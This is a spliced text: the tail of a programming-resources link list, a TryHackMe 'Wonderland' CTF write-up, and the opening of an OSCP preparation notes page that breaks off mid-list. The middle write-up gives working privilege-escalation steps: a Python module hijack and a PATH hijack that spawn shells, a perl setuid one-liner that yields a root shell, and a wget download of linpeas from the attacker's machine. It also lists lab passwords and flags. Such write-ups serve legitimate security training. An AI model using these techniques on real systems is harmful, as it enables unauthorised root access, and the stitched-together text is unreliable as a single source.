ICPC Practice problems](http://poj.org/problemlist) : Judge online for ACMACPC - [Sphere Online Judge (SPOJ)](http://www.spoj.com) : Become a true programming master Learn how to code and build efficient algorithms - [Topcoder](https://www.topcoder.com) : Deliver Faster through Crowdsourcing - [URI Online Judge](https://www.urionlinejudge.com.br/judge/en/register) : Practice coding, Compete and be a better coder. - [UVa Online Judge](https://uva.onlinejudge.org) : hundreds of problems supporting multiple languages. - [WakaTime](https://wakatime.com) : leaderboards of coding metrics collected via editor plugins - [PrepBytes](https://mycode.prepbytes.com/competitive-coding/practice) : Topic and level wise proper arrange problems - [A2OJ Ladders](https://a2oj.com/Ladders.html) : Practice codeforces problems based on your proficiency and difficulty <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Computer Books - [Become a Programmer, Motherfucker (list of books)](http://programming-motherfucker.com/become.html) : Exhaustive list of books from Zed A. Shaw. - [Best books for GATE CSE](http://gatecse.in/best-books-for-gatecse/) - [cses.fi/book.html](https://cses.fi/book.html) - [github.com/vhf/free-programming-books](https://github.com/EbookFoundation/free-programming-books/blob/master/free-programming-books.md) : More than 500 free ebooks on almost any language you can think of - [GitBook](https://www.gitbook.com) : GitBook helps your team write, collaborate, and publish content online. - [Data Science course](https://jakevdp.github.io/PythonDataScienceHandbook/) : Python Data Science Handbook - [Goal Kicker](https://goalkicker.com) : Programming Notes for Professionals books - [The GraphQL Guide](https://graphql.guide) : The complete guide to GraphQL, the new REST ✨ - [Eloquent JavaScript](https://eloquentjavascript.net/) : A book about JavaScript, programming, and the wonders of the digital. - [programmingbooks.dev](https://www.programmingbooks.dev) : An Ordered and Curated Reading List for Software Craftsmanship Growth. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Video Tutorials - [Aditya Verma](https://www.youtube.com/channel/UC5WO7o71wvxMxEtLRkPhiQQ): Algorithm tutorials playlists by an Indian youtuber Aditya verma. - [codedamn](https://www.youtube.com/channel/UCJUmE61LxhbhudzUugHL2wQ/videos) : front end web dev tutorials - [Code School](https://www.codeschool.com) : A PluralSight Company and an Interactive learning destination for aspiring and experienced Developers - [CodingMadeEasy](https://www.youtube.com/user/CodingMadeEasy/videos) : C++ tutorials - [CS1: Higher Computing - Richard Buckland UNSW](https://www.youtube.com/playlist?list=PL6B940F08B9773B9F) : a very good introductory CS course - [Derek Banas](https://www.youtube.com/user/derekbanas/videos) : good quality tutorials - [Design and Analysis of Algorithms](http://openclassroom.stanford.edu/MainFolder/CoursePage.php?course=IntroToAlgorithms) - [DevTips](https://www.youtube.com/user/DevTipsForDesigners/videos) : web dev tutorials - [FreeCourses](https://freecourses.github.io) : Free courses about programming - [Kathryn Hodge](https://www.youtube.com/channel/UC4DwZ2VXM2KWtzHjVk9M_xg/videos) : Has good videos for beginners - [Kunal Kushwaha](https://www.youtube.com/watch?v=apGV9Kg7ics) : An amazing guide to Git and GitHub for beginners - [mycodeschool](https://www.youtube.com/user/mycodeschool/videos) : Data structures and algorithms tutorials - [Pluralsight](https://www.pluralsight.com) : Learn Software Development, DevOps and Data Science through multiple short courses - [thenewboston](https://www.youtube.com/user/thenewboston/videos) : good but with too much talk as compared to actual content - [Tushar Roy](https://www.youtube.com/user/tusharroy2525/videos) : Algorithm and Data structure tutorial by an Indian Youtuber. - [Vim Tutorial Videos - Flarfnoogins](http://derekwyatt.org/vim/tutorials/index.html) : good video tutorial for learning vim - [XDA-University - Helping You Learn Android Development](https://forum.xda-developers.com/general/xda-university) - [Khan Academy](https://www.khanacademy.org/computing/computer-science) : learn about computer science for free - [Functional programming](https://www.youtube.com/watch?v=1PhArSujR_A) : John Carmack on Functional Programming (2013) - [Video about vims](https://vimeo.com/album/2838732) : A serie of tutorials about Vim - [Mastering Next.js](https://masteringnextjs.com/) : A free serie of videos to learn Next.js <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Online Compiler and Sharing Code snippets - [C9.io](https://c9.io) : Your development environment, in the cloud - [Carbon](https://carbon.now.sh/) : Create pretty looking images of your code snippets. - [Codeframe](https://codeframe.co/) : Online pastebin-like playground for building websites using HTML, CSS, and JavaScript - [CodePad](https://codepad.remoteinterview.io) : Code editor to try, test and run 25+ languages - [Coder](https://coder.com) : A Web-based development environment using Visual Studio Code as a code editor - [Codesandbox.io](https://codesandbox.io) : CodeSandbox makes it easier to create, share, and reuse React projects with others. - [Github Gist](https://gist.github.com) : Instantly share code, notes, and snippets. - [Godbolt.org](https://godbolt.org) : Excellent tool for exploring the assembly output of different compilers with and without optimization. - [Ideone.com](https://ideone.com) : online compiler and debugging tool for more than 60 programming languages - [JSFiddle](https://jsfiddle.net) : Test your JavaScript, CSS, HTML or CoffeeScript with online code editor - [JSBin](https://jsbin.com/) : Front end playground, Output is not framed, so it allows you to share those snippets that will break inside an iframe. - [Judge0 IDE](https://ide.judge0.com) : Online compiler with 40+ interpreters and compilers. - [Pastebin.com](https://pastebin.com) : Pastebin can store texts like code, notes, and snippets online for a set time which can be shared instantly. - [PlayCode](https://playcode.io/) : Online Javascript playground with a built-in console and support for npm packages. - [Wandbox](https://wandbox.org/): Online compiler with bleeding edge C++ and 40 other languages. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Blogs of Developers - [Algo-Geeks](http://algo-geeks.blogspot.com) : Programming Puzzles, Math Tricks, Algorithms, etc - [Amit Merchant](https://www.amitmerchant.com) : Tutorials, tips & tricks, and rants about programming and design. - [Andy Heathershaw](https://www.andyheathershaw.uk) : Personal website and blog of software developer Andy Heathershaw - [Antonio081014's Algorithms Codes](http://code.antonio081014.com) : The world is under the RULE. - [Archives — Ask a Manager](http://www.askamanager.org/archives) : HR-related stuff - [Armin Ronacher's Thoughts and Writings](http://lucumr.pocoo.org) : blog on Python and open source - [blog.might.net](http://matt.might.net/articles/) : the blog of might dot net - [Brendon Gregg - Linux Kernel Dev](http://www.brendangregg.com) : the blog of Brendon D. Gregg - [Clean Coder Blog](http://blog.cleancoder.com) : a blog of the author of the book "Clean Code" - [CodeAhoy](https://codeahoy.com) : Blog on software and human factors. 100% Tested on Humans. - [CoderGears Blog Insights from](http://www.codergears.com/Blog/) : the CoderGears Team - [Coding Geek - A blog about IT, programming and Java](http://coding-geek.com) : A blog about IT, programming and Java - [Coding Horror](https://blog.codinghorror.com) : one the best coding blog - [CSE Blog](http://www.cseblog.com) : quant, math, computer science puzzles - [CSS Tricks](https://css-tricks.com/) : about building websites and all that entails, mostly from a front-end perspective - [Daedtech.com](https://www.daedtech.com) : Stories about software - [Dan Dreams of Coding](https://dandreamsofcoding.com) - [Daniel Lemire's Blog](https://lemire.me/blog/) : Daniel Lemire's blog - [Eli Bendersky](http://eli.thegreenplace.net) : everything from Python to LLVM - [Geek Land](https://avidullu.wordpress.com) : My precious collectibles - [HackerEarth Blog](http://blog.hackerearth.com) : The HackerEarth blog - [IT Enthusiast](http://rodiongork.tumblr.com) : IT Enthusiast - [Joel on Software](https://www.joelonsoftware.com) : The blog of the CEO of StackOverflow - [Late Developer](https://latedev.wordpress.com) : Random thoughts of an old C++ guy - [Linux Forums](https://www.linux.org/forums) : A Friendly Linux Forum - [1ucasvb's laboriginal math and physics visualization](http://1ucasvb.tumblr.com) : Lucas Vieira Barbosa's lab original math and physics visualization - [Math ∩ Programming](https://jeremykun.com) : Math ∩ Programming - [My Tech Interviews](http://www.mytechinterviews.com) : PREPARE FOR A TECHNICAL INTERVIEW - [Paul Graham Essays](http://www.paulgraham.com/articles.html) : Paul Grahan Essays - [Programming Blog](http://www.yegor256.com) : programming blog of Yegor Bugayenko - [Programming in the 21st Century](http://prog21.dadgum.com) : programming in the twenty-first century - [rudhakar Rayavaram](http://sudhakar.online) : Sudhakar Rayavaram Blog's - [Runhe Tian Coding Practice](https://tianrunhe.wordpress.com) : Technical interview questions from Apple, Google, Facebook, Amazon, and Microsoft - [Small Programming Challenges and Puzzles](https://www.nayuki.io/category/programming) : Project Nayuki - [stevehanov.ca](http://stevehanov.ca/blog/) : I know how to make and sell software online, and I can share my tips with you. - [Takipi Blog](http://blog.takipi.com) : mainly focuses on Java and JVM languages - [XDA - Android Developer Forum](https://forum.xda-developers.com) : Android Open Source Developers Forum - [The Net Ninja](https://www.thenetninja.co.uk/): Web development tutorials <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## For improving your English - [Englishclub.com/learn-english](https://www.englishclub.com/learn-english.htm) - [Guide to Grammar and Writing](http://grammar.ccc.commnet.edu/grammar/) : for those who want to improve their English language skills - [Punctuation and Capitalization Rules](http://www.grammarbook.com/english_rules.asp) - [Purdue University Online Writing Lab (OWL)](https://owl.english.purdue.edu) - [Quia - English](https://www.quia.com/shared/english/) - [AntiMoon Immersion Approach](http://www.antimoon.com/how/howtolearn.htm): Immersion-based learning of English, can be used by people on different levels. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## When you get bored from CS related stuff - [Barcroft TV](https://www.youtube.com/user/barcroftmedia/featured) : Daily short documentaries about the incredible variety of people that make up the world - [Big Think](https://www.youtube.com/user/bigthink/videos) : Expert driven, actionable, educational content, featuring experts ranging from Bill Clinton to Bill Nye - [ColdFusion](https://www.youtube.com/user/coldfustion/videos) : Past, present, and future of technology - [CrashCourse](https://www.youtube.com/user/crashcourse/videos) : small courses on various subjects - [Every Frame a Painting](https://www.youtube.com/user/everyframeapainting/videos) : High-quality analysis of films and filmmaking - [National Geographic](https://www.youtube.com/user/NationalGeographic/videos) : High volume of high-quality content from all over the world - [r/ProgrammerHumor](https://www.reddit.com/r/ProgrammerHumor/) : Subreddit dedicated to exactly what it sounds like - [Reddit the front page of the internet](https://www.reddit.com) : Where free time goes to die - [Ridddle](https://www.youtube.com/user/VineMontanaTV/videos) : A youtube channel about science, mainly, but not only, the universe and space. - [Regex Crossword](https://regexcrossword.com) : A simple crossword game where clues are regex that must be matched. - [SciShow](https://www.youtube.com/user/scishow/videos) : Answers to interesting questions that you've always wondered about - [SmarterEveryDay](https://www.youtube.com/user/destinws2/videos) : Lots of amazing scientific information about the world around us, usually captured with a high-speed camera - [TED](https://www.youtube.com/user/TEDtalksDirector/videos) : Great talks about technology, entertainment, and design - [TestTube News](https://www.youtube.com/user/TestTubeNetwork/videos) : Interesting information about news from around the world - [How to live for a long time ?](http://www.bbc.com/future/story/20170601-the-secret-to-a-long-and-healthy-life-eat-less) : The secret of longevity - [Vsauce](https://www.youtube.com/user/Vsauce/videos) : The best youtube channel - [Ox A cuk](http://www.ox.ac.uk/research/research-in-conversation/how-live-happy-life/dr-bronwyn-tarr#) : How to live a happy life - [lonelyspeck](https://www.lonelyspeck.com/the-milky-way-in-los-angeles-light-pollution/) : Expose to the Right for Astrophotography in Light Pollution – Palos Verdes, Los Angeles, California <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Open Source Websites - [N-O-D-E](https://n-o-d-e.net/) : Everything open-source and hacker culture - news, zines, and projects - [Open Hatch](https://openhatch.org) : OpenHatch is a non-profit dedicated to matching prospective free software contributors with communities, tools, and education. - [Source Forge](https://sourceforge.net) : SourceForge hosts nearly 280,000 projects (at last count). It serves more than 2 million downloads a day and includes apps and tools in a wide variety of categories. - [Google Code](https://code.google.com/projecthosting) : Google offers free hosting for open source projects using the Subversion or Mercurial version control systems. It offers 2 GB of storage, integrated code review tools, a wiki, and an issue tracker. The Google Code site also provides links to Google's many publicly available APIs and other developer tools. - [Launch Pad](https://launchpad.net) : Maintained by Canonical, LaunchPad is particularly targeted at projects that run on Ubuntu. It provides hosting for more than 21,000 projects that use the Bazaar version control system. - [Google Open Source](https://opensource.google.com) : Google Open Source - [Red Hat Developer](https://developers.redhat.com) : The world's leading provider of open source solutions - [Open Source](https://opensource.com) : Open Source - [Google Summer of Code](https://summerofcode.withgoogle.com) : Google Summer of Code is a global program focused on bringing more student developers into open source software development. Students work with an open-source organization on a 3-month programming project during their break from school. - [Open Source Web Design](http://www.oswd.org) : Open Source Web Design is a platform for sharing standards-compliant free web design templates. We give web publishers a voice through good design. - [Mozilla Winter of Security](https://wiki.mozilla.org/Security/Automation/Winter_Of_Security_2016) : The Winter of Security (MWOS) is a program organized by Mozilla's Security teams to involve students with Security projects. Students who have to perform a semester project as part of their university curriculum can apply to one of the MWOS projects. - [Bit Bucket](https://bitbucket.org) : Like GitHub, BitBucket hosts both public and private projects. On this site, open-source projects and private projects with fewer than five users are free. It hosts more than 48,000 repositories, many of which are searchable on the site. - [Media Wiki](https://www.mediawiki.org/wiki/MediaWiki) : MediaWiki is a free software open source wiki package written in PHP, originally for use on Wikipedia. It is now also used by several other projects of the non-profit Wikimedia Foundation and by many other wikis, including this website, the home of MediaWiki. - [Code Curiosity](https://codecuriosity.org) : CodeCuriosity is a platform that encourages contributions to open source. Everyone is rewarded for their efforts, no matter how big or small they are. - [Code Triage](https://www.codetriage.com) : Help out your favorite open-source projects and become a better developer while doing it. - [Issue Hub](http://issuehub.io) : Contribute to Open Source. Search issue labels to find the right project for you - [Up for Grabs](http://up-for-grabs.net) : This is a list of projects which have curated tasks specifically for new contributors. These are a great way to get started with a project or to help share the load of working on open source projects. - [First Timers Only](http://www.firsttimersonly.com) : Contributing to open source for the first time can be scary and a little overwhelming. Perhaps you’re a Code Newbie or maybe you’ve been coding for a while but haven’t found a project you felt comfortable contributing to. - [Your First PR](http://yourfirstpr.github.io) : Your First PR helps you get started contributing to Open Source by showcasing great starter issues on GitHub and elsewhere. - [Awesome First PR Opportunities](https://github.com/mungell/awesome-for-beginners) : An awesome repository for finding beginner-friendly projects in different programming languages. - [EddieHub Open source community](https://github.com/EddieHubCommunity) : A Supportive community for people who are interested or already contributing in Open source. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Internships - [Chegg](http://www.chegg.com) : It is an awesome resource for finding internships, scholarships, tutors, etc. - [Internshala](https://internshala.com) : You can search for internships here according to your skill sets for your interested location. It also helps you in getting a good PPO offer from the company. - [Letsintern](https://www.letsintern.com) : Get a smart and challenging internship for you from the LetsIntern. - [PerfectIntern](https://www.perfectintern.com): Get help finding a paid internship, resume prep, interview prep, and more! <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Jobs - [AngelList](https://angel.co/) : AngelList is a website for startups, angel investors, and job-seekers looking to work at startups. - [CareerBuilder](https://hiring.careerbuilder.com) : CareerBuilder is one of the largest job boards, providing job listings, resume posting, and career advice and resources to job seekers. - [Dice](https://www.dice.com) : Dice is the leading site for tech job seekers. You can search by company, job title, keyword, employment type, and location. - [Devsnap](https://devsnap.io) : Devsnap is a job aggregator for developer jobs. - [DevITjobs UK](https://devitjobs.uk/) : Transparent job board for UK based developers - [Glassdoor](https://www.glassdoor.co.in) : Find the job that's right for you. Search all the open positions on the web. Get your own personalized salary estimate. - [IAESTE](http://iaesteunitedstates.org) : Find more and amazing international internships and jobs. - [Indeed](https://www.indeed.com) : Find international jobs on Indeed and get a market salary for your dedication and devotion. - [Instahyre](https://www.instahyre.com) : Your dream job is here. Showcase yourself to a curated list of top companies. Complete privacy and no spam. - [Mentat](https://thementat.com) : Get your dream job 10x faster. Never apply for a job ever again, talk directly to decision-makers and hiring managers. - [The Muse](https://www.themuse.com) : Find everything you need to succeed from dream jobs to career advice. You can do a lot here on The Muse like exploring companies, browsing jobs, career advice, discover careers, career coaching. Try it. - [Paysa](https://www.paysa.com) : Paysa helps you in finding new and interesting jobs according to your wish. - [SimplyHired](https://www.simplyhired.com) : Simply Hired is a free job search engine (and mobile app) that takes the hassle out of getting hired and provides you with all the information you need to make a sound career move. - [SwissDev Jobs](https://swissdevjobs.ch) : Tech job board for Software Engineers that want to work in Switzerland. - [Undercover Recruiter](https://theundercoverrecruiter.com) : Become Recruiter, Candidate or Employer. You can get your job easily here. - [Who is Hiring](https://whoishiring.io) : An awesome resource for searching, filtering, and finding new and attractive jobs according to your needs and interests. - [ZipRecruiter](https://www.ziprecruiter.com) : The Smartest Way to Get Hired. - [RemoteML](https://remoteml.com/) : Remote Machine Learning jobs. - [Linkedin jobs](https://www.linkedin.com/jobs) : A very nice research tool for programming jobs - [GermanTech Jobs](https://germantechjobs.de/) : Dedicated job board for tech roles in Germany - with salary brackets - [We Work Remotely](https://weworkremotely.com/) : The largest remote work community in the world. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ### Special Thanks - Please consider a GitHub star if you find this useful and/or consider contributing. - A special thanks to Ashish Padalkar (@ashish2199) for contributing a great amount of data and structure to the initial repository [Original Post](https://www.quora.com/How-to-Create-a-Blog-2/answer/Ashish-Padalkar?srid=OH96).
### IP `10.10.226.175` # Enumeration ### nmap `nmap -sC -sV 10.10.226.175 -oN init.nmap` ``` Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-22 15:27 EST Nmap scan report for 10.10.226.175 Host is up (0.14s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA) | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA) |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Follow the white rabbit. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 42.37 seconds ``` * We have ssh and http ### gobuster `gobuster dir -u http://10.10.226.175/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt` ``` =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.226.175/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/02/22 15:50:18 Starting gobuster =============================================================== /img (Status: 301) /r (Status: 301) Progress: 12164 / 220561 (5.52%) =============================================================== 2021/02/22 15:52:34 Finished =============================================================== ``` * Seeing that we have to "follow the rabbithole" on the website and the first directory is just `/r`, I guessed that I have to go to `/r/a/b/b/i/t` * If we look at the source of this, we find: `alice:HowDothTheLittleCrocodileImproveHisShiningTail` * This looks like it works as ssh credentials # SSH `ssh [email protected]` with password `HowDothTheLittleCrocodileImproveHisShiningTail` ### privesc to rabbit * Running `sudo -l` gives us the following output: ``` Matching Defaults entries for alice on wonderland: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py ``` * We can run that python file as the rabbit user * Looking at the file, we can see that it does `import random.py` at the start * We can overload that import by creating our own file that does something malicious * To get a shell, we can make a file `random.py` with the following contents: ```python import os os.system("/bin/sh") ``` * Running `sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py` gets us to the rabbit user ### privesc to hatter * In the rabbit home directory, there is a binary called `teaParty` * We don't really know what it does, so let's run it locally * First, start a file server on the machine with `python3 -m http.server` * Then do `wget 10.10.226.175:8000/teaParty` to get the binary locally * Looking at the disascompilation in ghidra shows us the following for main (which was the only user-defined-function): ```c void main(void) { setuid(0x3eb); setgid(0x3eb); puts("Welcome to the tea party!\nThe Mad Hatter will be here soon."); system("/bin/echo -n \'Probably by \' && date --date=\'next hour\' -R"); puts("Ask very nicely, and I will give you some tea while you wait for him"); getchar(); puts("Segmentation fault (core dumped)"); return; } ``` * The binary runs a `seuid` and `setgid`, which is practically begging us for a privesc * These ensure that privileges don't drop during the program * Running `id hatter` shows us that id `1003`, (aka the `0x3eb` in the binary) is the `hatter` user ``` uid=1003(hatter) gid=1003(hatter) groups=1003(hatter) ``` * There's also a tiny bit of trickery going on, as we can see that the binary prints a segfault no matter what * This could have been determined by not printing errors using `./teaParty 2>/dev/null` * The binary also runs the `date` command. Because it isn't an absolute path, we can hijack that * Let's make our own binary that gets shell with the following in a file called "date" ```bash #!/bin/sh /bin/sh ``` * nano didn't work for some reason, so I used `echo "#!/bin/sh" > date` and `echo "/bin/sh" >> date` * Now, we can change our path variable to point to the current directory instead of /bin with `export PATH=/home/hatter:$PATH` * Running the binary gets us the hatter user * Going to his home directory, we can `cat password.txt` to get `WhyIsARavenLikeAWritingDesk?` * This turns out to be his ssh password, which makes things easier. SSH the same way as before ### privesc to root * Let's upload linpeas * We can set up a file server with `python3 -m http.server 80` * My tun0 address is 10.6.36.105 * Run `wget 10.6.36.105/linpeas.sh` * Running linpeas, there's a lot of output, but we see some interesting setuid binaries: ``` Files with capabilities: /usr/bin/perl5.26.1 = cap_setuid+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/perl = cap_setuid+ep ``` * perl is an easy way to privesc, so we can run `./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'` * [Reference](https://www.hackingarticles.in/linux-for-pentester-perl-privilege-escalation/) * Now, running `cat /root/user.txt`, we get the user flag: `thm{"Curiouser and curiouser!"}` * Running `cat /alice/root.txt` gets the root flag: `thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}`
![visitor badge](https://visitor-badge.glitch.me/badge?page_id=shreyaschavhan.oscp-pre-preparation-plan-and-notes&left_text=Views) `Note: These are my notes for personal reference!` # 𝐎𝐒𝐂𝐏 𝐏𝐫𝐞-𝐏𝐫𝐞𝐩𝐚𝐫𝐚𝐭𝐢𝐨𝐧 𝐏𝐥𝐚𝐧 𝐚𝐧𝐝 𝐍𝐨𝐭𝐞𝐬 > - `21st March 2022` : Start Date > - `19th Sept 2022` : Expected End Date > - `180 days` : Goal --- <img src="https://user-images.githubusercontent.com/68887544/159728391-b9c52bda-b711-4c63-aa52-3886a7ab54c1.png"> ## ⁍ 𝐓𝐚𝐛𝐥𝐞 𝐨𝐟 𝐂𝐨𝐧𝐭𝐞𝐧𝐭𝐬 - Resources: > - [Pre-requisites](#𝐏𝐫𝐞-𝐫𝐞𝐪𝐮𝐢𝐬𝐢𝐭𝐞𝐬) > - [Getting Comfortable with Kali Linux](#𝐆𝐞𝐭𝐭𝐢𝐧𝐠-𝐂𝐨𝐦𝐟𝐨𝐫𝐭𝐚𝐛𝐥𝐞-𝐰𝐢𝐭𝐡-𝐊𝐚𝐥𝐢-𝐋𝐢𝐧𝐮𝐱) > - [Command Line Fun](#𝐂𝐨𝐦𝐦𝐚𝐧𝐝-𝐋𝐢𝐧𝐞-𝐅𝐮𝐧) > - [Practical Tools](#𝐏𝐫𝐚𝐜𝐭𝐢𝐜𝐚𝐥-𝐓𝐨𝐨𝐥𝐬) > - [Bash Scripting](#𝐁𝐚𝐬𝐡-𝐒𝐜𝐫𝐢𝐩𝐭𝐢𝐧𝐠) > - [Passive Information Gathering](#𝐏𝐚𝐬𝐬𝐢𝐯𝐞-𝐈𝐧𝐟𝐨𝐫𝐦𝐚𝐭𝐢𝐨𝐧-𝐆𝐚𝐭𝐡𝐞𝐫𝐢𝐧𝐠) > - [Active Information Gathering](#𝐀𝐜𝐭𝐢𝐯𝐞-𝐈𝐧𝐟𝐨𝐫𝐦𝐚𝐭𝐢𝐨𝐧-𝐆𝐚𝐭𝐡𝐞𝐫𝐢𝐧𝐠) > - [Vulnerability Scanning](#𝐕𝐮𝐥𝐧𝐞𝐫𝐚𝐛𝐢𝐥𝐢𝐭𝐲-𝐒𝐜𝐚𝐧𝐧𝐢𝐧𝐠) > - [Web Application Attacks](#𝐖𝐞𝐛-𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧-𝐀𝐭𝐭𝐚𝐜𝐤𝐬) > - [Buffer Overflow](#𝐁𝐮𝐟𝐟𝐞𝐫-𝐎𝐯𝐞𝐫𝐟𝐥𝐨𝐰) > - [Client-side Attacks](#𝐂𝐥𝐢𝐞𝐧𝐭-𝐬𝐢𝐝𝐞-𝐀𝐭𝐭𝐚𝐜𝐤𝐬) > - [Locating Public Exploits](#𝐋𝐨𝐜𝐚𝐭𝐢𝐧𝐠-𝐏𝐮𝐛𝐥𝐢𝐜-𝐄𝐱𝐩𝐥𝐨𝐢𝐭𝐬) > - [Antivirus Evasion](#𝐀𝐧𝐭𝐢𝐯𝐢𝐫𝐮𝐬-𝐄𝐯𝐚𝐬𝐢𝐨𝐧) > - [Privilege Escalation](#𝐏𝐫𝐢𝐯𝐢𝐥𝐞𝐠𝐞-𝐄𝐬𝐜𝐚𝐥𝐚𝐭𝐢𝐨𝐧) > - [Password Attacks](#𝐏𝐚𝐬𝐬𝐰𝐨𝐫𝐝-𝐀𝐭𝐭𝐚𝐜𝐤𝐬) > - [Port Redirection and Tunneling](#𝐏𝐨𝐫𝐭-𝐑𝐞𝐝𝐢𝐫𝐞𝐜𝐭𝐢𝐨𝐧-𝐚𝐧𝐝-𝐓𝐮𝐧𝐧𝐞𝐥𝐢𝐧𝐠) > - [Active Directory Attacks](#𝐀𝐜𝐭𝐢𝐯𝐞-𝐃𝐢𝐫𝐞𝐜𝐭𝐨𝐫𝐲-𝐀𝐭𝐭𝐚𝐜𝐤𝐬) > - [The Metasploit Framework](#𝐓𝐡𝐞-𝐌𝐞𝐭𝐚𝐬𝐩𝐥𝐨𝐢𝐭-𝐅𝐫𝐚𝐦𝐞𝐰𝐨𝐫𝐤) > - [Powershell Empire](#𝐏𝐨𝐰𝐞𝐫𝐬𝐡𝐞𝐥𝐥-𝐄𝐦𝐩𝐢𝐫𝐞) > - [Trying Harder: The Labs](#𝐓𝐫𝐲𝐢𝐧𝐠-𝐇𝐚𝐫𝐝𝐞𝐫-𝐓𝐡𝐞-𝐋𝐚𝐛𝐬) - [Strategy](#𝐒𝐭𝐫𝐚𝐭𝐞𝐠𝐲) ## 𝐏𝐫𝐞-𝐫𝐞𝐪𝐮𝐢𝐬𝐢𝐭𝐞𝐬 > - Solid understanding of TCP/IP networking > - TCP/IP Fundamentals > - [Part I](https://youtu.be/xdQ9sgpkrX8) > - [Part II](https://youtu.be/NdvWI6RH1eo) > - Familiarity with basic Bash and/or Python scripting > - Python Books: > - [Learn Python 3 the hard way](https://g.co/kgs/dtmGpu) > - [Learn More Python 3 the hard way](https://g.co/kgs/iqHMau) > - [Black Hat Python](https://g.co/kgs/xmdQNE) > - [Violent Python](https://g.co/kgs/vJfCsm) > - [Violent Python Codes in Python 3](https://github.com/EONRaider/violent-python3) > - Vidoes: > - [The Complete Python Hacking Course: Beginner To Advance! (2021)](https://youtu.be/0NQ2aMxBYNE) > - Broken Link Update : [Access it here](https://web.archive.org/web/20210222183051/https://www.youtube.com/watch?v=0NQ2aMxBYNE&feature=youtu.be) > - [The Complete Python Hacking Course Playlist](https://youtube.com/playlist?list=PL9bcYdRTwTIme7BckMbAd55KdwEzeSe9m) > - [Python Notes for OSCP](https://github.com/shreyaschavhan/python-for-oscp) ``` Update (16th Oct 2022): One of the above python course wasn't available anymore. But you can use waybackmachine to access it again. A quick tip for any broken link that might exist here in this repository: - Use Wayback machine ``` ``` Thoughts: `Learn python 3 the hard way` is the best book for python according to me! ``` ``` Estimated Time: 24 hours ``` ## 𝐆𝐞𝐭𝐭𝐢𝐧𝐠 𝐂𝐨𝐦𝐟𝐨𝐫𝐭𝐚𝐛𝐥𝐞 𝐰𝐢𝐭𝐡 𝐊𝐚𝐥𝐢 𝐋𝐢𝐧𝐮𝐱 > - [Installing Kali Linux on VMware](https://youtu.be/UbGYDDnFAEg) > - [Kali Linux on Windows in 5 mins](https://youtu.be/AfVH54edAHU) > - [Linux for Hackers by NetworkChuck](https://youtube.com/playlist?list=PLIhvC56v63IJIujb5cyE13oLuyORZpdkL) > - [Linux for beginners (Hindi) by Codewithharry](https://youtu.be/_tCY-c-sPZc) > - [Linux for Hackers (Kali Linux Tutorial)](https://youtu.be/lZAoFs75_cs) > - [Kali Linux Training](https://kali.training/) > - [Linux Commands cheatsheet](https://github.com/shreyaschavhan/linux-commands-cheatsheet) - Should learn `(imp)`: ``` - man - apropos - ls - cd - pwd - mkdir - rm - which - locate - find - ssh - grep - apt ``` ``` Estimated Time: 8 hours ``` ## 𝐂𝐨𝐦𝐦𝐚𝐧𝐝 𝐋𝐢𝐧𝐞 𝐅𝐮𝐧 > - [Linux Commands cheatsheet](https://github.com/shreyaschavhan/linux-commands-cheatsheet) > - Book: [The Linux Command Line](https://g.co/kgs/7gC3DZ) > - Practice: > - [Overthewire Bandit](https://overthewire.org/wargames/bandit/) > - [Cmdchallenge](https://cmdchallenge.com/) > - Vim Tutorial: https://youtu.be/IiwGbcd8S7I - Should learn: ``` - Environment Variables in Bash - grep - awk - cut - sed - comm - diff - vimdiff - ping - bg - fg - jobs - kill - ps - wget - curl - axel ``` - Text Editors you should be familiar with: ``` - nano - vi(m) ``` ``` Excepted time (without practice): 12 hours ``` ## 𝐏𝐫𝐚𝐜𝐭𝐢𝐜𝐚𝐥 𝐓𝐨𝐨𝐥𝐬 - Official Syllabus Tools ``` - Netcat - Socat - Powershell - Powercat - Wireshark - Tcpdump ``` - Enumeration ``` AutoRecon — https://github.com/Tib3rius/AutoRecon nmapAutomator — https://github.com/21y4d/nmapAutomator Reconbot — https://github.com/Apathly/Reconbot Raccoon — https://github.com/evyatarmeged/Raccoon RustScan — https://github.com/RustScan/RustScan BashScan — https://github.com/astryzia/BashScan ``` - Web Related ``` Dirsearch — https://github.com/maurosoria/dirsearch GoBuster — https://github.com/OJ/gobuster Recursive GoBuster — 